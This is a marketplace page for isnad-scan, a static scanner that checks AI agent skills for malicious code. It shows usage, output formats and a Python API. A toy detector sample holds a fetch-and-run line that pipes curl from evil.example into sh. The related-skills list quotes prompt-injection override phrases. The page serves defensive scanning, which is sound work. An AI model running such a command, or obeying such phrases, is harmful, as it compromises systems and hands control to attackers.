isnad-scan
Scan AI agent skills for security vulnerabilities — detects code injection, prompt injection, credential exfiltration, supply chain attacks, and 69+ threat patterns. Use when installing new skills, auditing existing ones, reviewing untrusted code, or validating packages before publishing.
About this skill
isnad-scan is a security scanning tool for AI agents and developers that statically analyzes AI agent skills and their codebases before they are installed or run. It detects more than 69 threat patterns across critical categories: code injection, prompt injection, credential exfiltration, network-based attacks, filesystem manipulation, and supply chain risks such as typosquatting. It can also check dependencies for known CVEs via OSV.dev, rounding out the audit. Verbose and machine-readable JSON output modes make it straightforward to automate checks and integrate the tool into CI/CD pipelines. For AI agents, isnad-scan acts as a built-in security auditor: an agent can evaluate the trustworthiness of any skill or package before executing or deploying it, protecting sensitive data and preventing system compromise through a compromised skill.
Best use case
This skill is primarily for AI agents, developers, and security professionals who need to ensure the integrity and safety of AI agent skills and their underlying codebases. It's crucial for pre-installation vetting, auditing existing components, and maintaining a secure supply chain for AI capabilities.
A detailed report of potential security vulnerabilities (CRITICAL, HIGH, MEDIUM, LOW) found within AI agent skills, packages, or code directories, optionally including CVEs and verbose output.
Practical example
Example input
Before I install the `my-new-tool` skill from GitHub, please scan its repository directory (`./skills/my-new-tool`) for any critical security vulnerabilities using `isnad-scan` and report the findings.
Example output
```json
{
  "summary": {"critical": 0, "high": 1, "medium": 1, "low": 0},
  "findings": [
    {"severity": "HIGH", "pattern": "Prompt Injection", "file": "skill_prompt.py"},
    {"severity": "MEDIUM", "pattern": "Code Injection", "file": "main.py"}
  ]
}
```
When to use this skill
- Before installing any new AI agent skill or package from an untrusted source.
- When auditing existing skills to identify previously unknown vulnerabilities or ensure compliance.
- During development or review of custom AI agent code before deployment or publishing.
- To validate third-party dependencies for known CVEs as part of a security pipeline.
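For the pre-installation and CI cases above, a minimal gate can be built on the scanner's JSON findings. This is a sketch: the `findings` array shape is taken from the example output earlier on this page, and the blocking policy (fail on CRITICAL or HIGH) is a local assumption, not something isnad-scan mandates.

```python
import json

# Findings shaped like the example output on this page; in a real pipeline
# this would come from `isnad-scan <path> --json`.
report_json = """
[
  {"severity": "HIGH", "pattern": "Prompt Injection", "file": "skill_prompt.py"},
  {"severity": "MEDIUM", "pattern": "Code Injection", "file": "main.py"}
]
"""

# Local policy choice: which severities should block an install.
BLOCKING = {"CRITICAL", "HIGH"}

def blocking_findings(findings):
    """Return only the findings severe enough to block installation."""
    return [f for f in findings if f["severity"] in BLOCKING]

blocked = blocking_findings(json.loads(report_json))
for f in blocked:
    print(f"BLOCK: [{f['severity']}] {f['pattern']} in {f['file']}")
```

With the example data, only the HIGH finding blocks; the MEDIUM one would be left for manual review, matching the severity guidance in the SKILL.md source below.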
When not to use this skill
- As a real-time intrusion detection system; isnad-scan is a static analysis tool.
- For scanning non-code assets or data files that are not part of an executable skill.
- As a replacement for comprehensive human security audits for highly sensitive applications.
- If the goal is to perform dynamic runtime analysis or penetration testing of a live system.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in `.claude/skills/isnad-scan/SKILL.md` inside your project
- Restart your AI agent — it will auto-discover the skill
How isnad-scan Compares
| Feature / Agent | isnad-scan | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Easy | N/A |
Frequently Asked Questions
What does this skill do?
It scans AI agent skills and packages for security vulnerabilities, detecting code injection, prompt injection, credential exfiltration, supply chain attacks, and more than 69 threat patterns in total. Use it when installing new skills, auditing existing ones, reviewing untrusted code, or validating packages before publishing.
How difficult is it to install?
Installation is rated as easy; the manual steps are listed in the Installation section above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
Cursor vs Codex for AI Workflows
Compare Cursor and Codex for AI coding workflows, repository assistance, debugging, refactoring, and reusable developer skills.
SKILL.md Source
# isnad-scan — Security Scanner for AI Agent Skills
Scan any skill, package, or directory for security threats before installing or running it.
## Quick Scan
```bash
isnad-scan <path>
```
Scans a directory and reports findings by severity (CRITICAL, HIGH, MEDIUM, LOW).
## Options
```bash
isnad-scan <path> --cve # Also check dependencies for known CVEs (via OSV.dev)
isnad-scan <path> -v # Verbose output (show matched lines)
isnad-scan <path> --json # Machine-readable JSON output
isnad-scan <path> --cve -v # Full audit: CVEs + verbose findings
```
## What It Detects (69+ patterns)
**Code Injection** — shell execution, eval, exec, subprocess, os.system, dynamic imports
**Prompt Injection** — role override attempts, instruction hijacking, jailbreak patterns
**Credential Exfiltration** — env var harvesting, keychain access, token theft, file reads of sensitive paths
**Network Threats** — reverse shells, DNS exfiltration, unauthorized outbound connections, webhook data leaks
**Filesystem Attacks** — path traversal, symlink attacks, /etc/passwd reads, SSH key access
**Supply Chain** — typosquatting detection, minified JS analysis, binary file scanning, hidden files
**Crypto Risks** — weak algorithms, hardcoded keys, wallet seed extraction
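As a rough illustration of how the first category is caught by pattern-based static analysis, here is a toy detector. The signatures below are made-up examples, not isnad-scan's actual rules.

```python
import re

# Toy signatures for the "Code Injection" category; a real scanner uses far
# richer rules and context. These regexes are illustrative assumptions.
SIGNATURES = {
    "shell execution": re.compile(r"\bos\.system\s*\("),
    "eval/exec": re.compile(r"\b(eval|exec)\s*\("),
    "subprocess": re.compile(r"\bsubprocess\.(run|Popen|call)\s*\("),
}

def scan_source(text):
    """Return (line number, signature name, line) for every match."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings

sample = 'import os\nos.system("curl http://evil.example | sh")\n'
findings = scan_source(sample)
```

Running this on `sample` flags line 2 as shell execution; clean code produces no findings.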
## When to Use
1. **Before installing a new skill** — scan the skill directory first
2. **Auditing existing skills** — periodic security review
3. **Reviewing PRs/contributions** — catch malicious code in submissions
4. **Pre-publish validation** — ensure your own skills are clean before sharing
5. **CI/CD integration** — `isnad-scan . --json` for automated checks
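The CI/CD item above could be wired into a GitHub Actions workflow along these lines. This is a sketch: the package name and flags come from this page, but the job layout is an assumption, and it presumes the CLI exits non-zero when blocking findings are present, which this page does not confirm.

```yaml
# Hypothetical pre-merge scan job; only `pip install isnad-scan` and the
# CLI flags are taken from this page, everything else is illustrative.
name: skill-security-scan
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.12"
      - run: pip install isnad-scan
      - run: isnad-scan . --cve --json
```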
## Interpreting Results
```
🔴 CRITICAL — Immediate threat. Do not install/run.
🟠 HIGH — Likely malicious or dangerous. Review carefully.
🟡 MEDIUM — Suspicious pattern. May be legitimate, verify intent.
🔵 LOW — Informational. Common in legitimate code but worth noting.
```
## Examples
Scan a ClawHub skill before installing:
```bash
isnad-scan ./skills/some-new-skill/
```
Full audit with CVE checking:
```bash
isnad-scan ./skills/some-new-skill/ --cve -v
```
JSON output for automation:
```bash
isnad-scan . --json | python3 -c "import sys,json; d=json.load(sys.stdin); print(f'{d[\"summary\"][\"critical\"]} critical, {d[\"summary\"][\"high\"]} high')"
```
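The same check can live in a small script instead of a shell one-liner. A sketch, assuming the summary schema used in the one-liner above (per-severity counts under `"summary"`):

```python
import json
import sys

def gate(report_text):
    """Print a one-line summary and return a shell-style exit code.

    The {"summary": {"critical": N, "high": N, ...}} schema is assumed
    from the shell one-liner above, not from official documentation.
    """
    summary = json.loads(report_text)["summary"]
    critical = summary.get("critical", 0)
    high = summary.get("high", 0)
    print(f"{critical} critical, {high} high")
    return 1 if (critical or high) else 0

if __name__ == "__main__":
    # e.g. isnad-scan . --json | python3 gate.py
    sys.exit(gate(sys.stdin.read()))
```

Piping `isnad-scan . --json` into this script fails the pipeline whenever any critical or high finding is reported.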
## Python API
```python
from isnad_scan import scan_directory
results = scan_directory("/path/to/skill")
for finding in results.findings:
    print(f"[{finding.severity}] {finding.category}: {finding.description}")
    print(f"  File: {finding.file}:{finding.line}")
```
## About ISNAD
ISNAD (إسناد) means "chain of transmission" — a method for verifying the authenticity of transmitted knowledge. isnad-scan is the security layer of the [ISNAD Protocol](https://isnad.md), bringing trust verification to the AI agent skill ecosystem.
**PyPI:** `pip install isnad-scan`
**GitHub:** [counterspec/isnad](https://github.com/counterspec/isnad)
**Protocol:** [isnad.md](https://isnad.md)
Related Skills
nmap-pentest-scans
Plan and orchestrate authorized Nmap host discovery, port and service enumeration, NSE profiling, and reporting artifacts for in-scope targets.
HIPAA Compliance for AI Agents
Generate HIPAA compliance checklists, risk assessments, and audit frameworks for healthcare organizations deploying AI agents.
Data Governance Framework
Assess, score, and remediate your organization's data governance posture across 6 domains.
Cybersecurity Risk Assessment
You are a cybersecurity risk assessment specialist. When the user needs a security audit, threat assessment, or compliance review, follow this framework.
afrexai-cybersecurity-engine
Complete cybersecurity assessment, threat modeling, and hardening system. Use when conducting security audits, threat modeling, penetration testing, incident response, or building security programs from scratch. Works with any stack — zero external dependencies.
Compliance & Audit Readiness Engine
Your AI compliance officer. Guides startups and scale-ups through SOC 2, ISO 27001, GDPR, HIPAA, and PCI DSS — from zero to audit-ready. No consultants needed.
Compliance Audit Generator
Run internal compliance audits against major frameworks without hiring a consultant.
AI Safety Audit
Comprehensive AI safety and alignment audit framework for businesses deploying AI agents. Built around the UK AI Security Institute Alignment Project standards (2026), EU AI Act requirements, and NIST AI RMF.
clickhouse-github-forensics
Query GitHub event data via ClickHouse for supply chain investigations, actor profiling, and anomaly detection. Use when investigating GitHub-based attacks, tracking repository activity, analyzing actor behavior patterns, detecting tag/release tampering, or reconstructing incident timelines from public GitHub data. Triggers on GitHub supply chain attacks, repo compromise investigations, actor attribution, tag poisoning, or "query github events".
security-guardian
Automated security auditing for OpenClaw projects. Scans for hardcoded secrets (API keys, tokens) and container vulnerabilities (CVEs) using Trivy. Provides structured reports to help maintain a clean and secure codebase.
mema-vault
Secure credential manager using AES-256 (Fernet) encryption. Stores, retrieves, and rotates secrets using a mandatory Master Key. Use for managing API keys, database credentials, and other sensitive tokens.
guardian-wall
Mitigate prompt injection attacks, especially indirect ones from external web content or files. Use this skill when processing untrusted text from the internet, user-uploaded files, or any external source to sanitize content and detect malicious instructions (e.g., "ignore previous instructions", "system override").